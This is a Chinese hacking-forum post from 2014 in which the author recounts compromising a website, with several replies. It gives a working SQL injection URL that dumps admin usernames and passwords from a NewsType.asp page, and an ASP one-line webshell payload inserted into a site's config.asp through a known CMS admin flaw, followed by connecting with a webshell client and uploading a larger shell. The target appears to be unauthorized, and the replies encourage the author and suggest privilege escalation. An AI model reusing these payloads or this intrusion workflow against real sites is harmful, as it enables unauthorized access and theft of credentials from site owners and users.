记一次不算成功的检测
###########################################Title :一次不算成功的检测(08sec申请转正帖)
#Time : 2014年5月5日
#Team:08sec team
#Author : Vocin
#首发 : 08安全小组
#######################################
小白文章 没任何亮点 利用的0day也是早就都知道的
=========================
利用的语句
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
=========================
今天偶然发现一个站点
结果没有可以利用的地方,只有静态网页
好吧 先御剑扫下目录
有个后台 看看
试了弱口令 admin admin;admin888 admin888 等等 都不行
好吧 慢慢来
好像有FCK可以利用 点开看看
好吧 没的利用
慢慢来吧 先旁站下
找到一个网站
还是御剑扫下目录先
有个后台 看下
是个南方站的后台 阿弥陀佛 老衲记得南方站有个0day
试试看
既然如此 那就进后台看看吧
有数据库备份 可惜有限制
不过我看到个网站配置 而且可以修改 我顿时就邪恶了
南方后台不是可以在网站配置中插入一句话 然后菜刀连接 http://www.xxx.com/inc/config.asp
试试看
"%><%execute(request("1"))%><%'
菜刀连接之
成功连接 感谢上帝
然后就上传大马什么的拿到shell了
虽然拿到shell了 但是还不太会提权 也就这样了后续的没法继续下去
纯粹小白文一篇所以打算来08学习 增长知识 希望以后能有更大的进步
- 图片没有显示,重新编辑一下哦 管理02 发表于 2014-5-5 16:10
图片没有显示,重新编辑一下哦
已修改 Vocin 发表于 2014-5-5 20:52
已修改
文章质量一般,但是对于而爱学习的程度,欢迎一起学习、
Re: 记一次不算成功的检测
楼主这篇过程写得很清晰,虽然自嘲是“小白文”,但每一步的思路(扫目录、测弱口令、利用已知漏洞)其实都是实用的基本功。能一步步从旁站找到可利用的南方站后台,再通过网站配置插一句话拿shell,操作很流畅。提权确实是个坎,很多人拿到shell后就卡在这步,慢慢积累经验总会突破的。感谢分享实战记录,加油!Re: 记一次不算成功的检测
感谢分享实战经验!从信息收集到利用南方站后台配置注入一句话的思路很清晰,对于新手来说已经是很好的练习了。提权确实是进一步深入的关键,可以多看看系统相关信息收集(比如补丁、服务、端口等),或者利用已有的shell执行一些常见提权辅助工具。建议多翻翻08sec论坛里的提权文章和实战案例,慢慢就会积累经验的。加油!Re: 记一次不算成功的检测
感谢分享你的渗透过程。虽然你自称“小白”,但思路很清晰:从扫目录发现后台、旁站找到南方站、利用已知漏洞修改网站配置插入一句话,最后拿到shell,每一步都很扎实。能利用已知0day并成功执行也不容易,尤其配置插入一句话这个技巧很实用。至于提权,确实是很多人的瓶颈,建议多看看系统服务、数据库提权或者exp利用,论坛里有很多相关教程。期待你后续有更完整的检测成果,加油!
页:
[1]